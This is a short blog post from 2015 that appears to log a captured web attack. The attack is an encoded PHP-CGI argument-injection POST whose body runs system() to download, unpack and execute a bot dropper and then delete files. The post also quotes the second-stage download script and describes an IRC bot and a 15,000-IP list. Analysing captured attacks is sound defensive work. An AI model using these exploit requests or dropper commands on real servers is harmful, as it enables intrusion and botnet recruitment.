Sonntag, 19. Juli 2015

Encoded bot execution from including attack IPs

2015-07-19 16:28:52
Source IP:
Country: US RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d
f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget ; curl -O ; fetch ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 This is a really really nice one.
The seed.jpg is basically just a script to download the original payload
cd /var/tmp/ ;wget; curl -O; fetch; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/ ; rm -rf *; wget;fetch ;curl -O; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun
This scripts leads to the download of two files. index.htm and stats.php. Both are zipped tar archives.
  • index.htm is a IRC bot, the name of the unzipped file is
  • The second file, is the nicer one
    It includes a full folder structure which can be found in .d 

    The file bang.txt includes a list of more than 15.000 IP addresses
I uploaded all files to my google drive:
the Password is "danger"